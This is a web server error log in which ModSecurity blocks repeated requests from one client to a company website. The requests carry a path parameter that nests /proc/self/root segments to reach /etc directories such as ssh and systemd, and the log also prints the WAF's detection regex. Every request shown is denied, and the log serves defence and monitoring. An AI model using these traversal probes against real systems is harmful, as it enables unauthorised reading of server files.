[Tue Mar 17 08:16:59.575064 2026] [:error] [pid 1961:tid 140411582465792] [client 74.7.241.46:41294] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4K3RXaaWotPICgYsbwQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:00.885376 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.241.46:41298] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4LKBJNF7axNlVR0X0dgAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:02.370710 2026] [:error] [pid 5398:tid 140411599251200] [client 74.7.241.46:41300] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4LgRES9pL8P-grjlfuwAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:03.895484 2026] [:error] [pid 5398:tid 140411599251200] [client 74.7.241.46:41302] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4LwRES9pL8P-grjlfvAAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:05.191201 2026] [:error] [pid 32588:tid 140411674785536] [client 74.7.241.46:41304] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4MS8PwvOE6ZaeZxiFzwAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:06.559988 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.241.46:41316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4Mu82sZHvlq4xgHq6ogAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:07.912158 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.241.46:41328] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4M9CmCSWTlPouqorC4QAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:09.236232 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.241.46:45384] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4NdCmCSWTlPouqorC4gAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:10.524759 2026] [:error] [pid 1016:tid 140411666392832] [client 74.7.241.46:45400] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4NpqmL8PQht4WJFlAQwAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:11.859268 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.241.46:45402] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4N9CmCSWTlPouqorC5AAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:13.231105 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.241.46:45418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4Oe82sZHvlq4xgHq6qgAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:14.543464 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.241.46:45432] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4OtCmCSWTlPouqorC5gAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:15.877257 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.241.46:45440] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4O9CmCSWTlPouqorC5wAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:17.189583 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.241.46:45444] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4PdCmCSWTlPouqorC6AAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:18.523793 2026] [:error] [pid 1517:tid 140411548894976] [client 74.7.241.46:45952] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4PmHuKRvkhJseepPadQAAAxc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:19.947528 2026] [:error] [pid 6002:tid 140411691570944] [client 74.7.241.46:45966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4P_AKZeKGvQeoFhlCqQAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:21.303085 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.241.46:45980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4QXRXaaWotPICgYsb1gAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:22.590971 2026] [:error] [pid 7000:tid 140411725141760] [client 74.7.241.46:45982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4QhePVOt35XCGZP8lWwAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:24.205638 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.241.46:45996] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4RJqmL8PQht4WJFlASgAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:25.608461 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.241.46:46010] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4RQQohV2v-7oj5HHyGgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:26.910958 2026] [:error] [pid 32588:tid 140411674785536] [client 74.7.241.46:46018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4Ri8PwvOE6ZaeZxiF0gAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:28.243526 2026] [:error] [pid 6002:tid 140411582465792] [client 74.7.241.46:44344] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag 